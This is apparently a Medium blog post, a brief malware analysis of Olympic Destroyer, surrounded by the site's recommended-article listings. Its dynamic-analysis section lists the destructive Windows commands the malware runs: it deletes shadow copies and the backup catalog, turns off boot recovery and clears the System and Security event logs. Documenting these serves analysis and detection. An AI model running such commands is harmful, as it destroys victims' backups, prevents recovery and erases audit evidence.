Malware Analysis — Olympic Destroyer

Image from WIRED article. Illustration: Joan Wong



Dynamic Analysis of Olympic Destroyer




C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System

C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security



System Stealer




cyber security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Three New NFTs released on BSC

FBI Starts Securing Organisations against ProxyLogon 👮‍♂️, Clubhouse Data Dump🏡, iOS Game…

Warp Introduces Voting and Fee Sharing token, veWarp

PoLido is live on Goerli Testnet!

The First Nomo Player Token Drop

AMPnet/APX Update: Launch on DuckSTARTER, APX TGE & Platform Going Live

Basic Business Email Security; The Disaster Waiting to Happen for Kenyan Banks

How to choose an Intrusion Detection System

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


cyber security

More from Medium

[RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator

Malware Analysis —Banking Trojan: Dyre

TryHackMe-Mobile Malware Analysis | By Subhadip Nag(Mrl0s3r)

CyberDefenders Write-up: Injector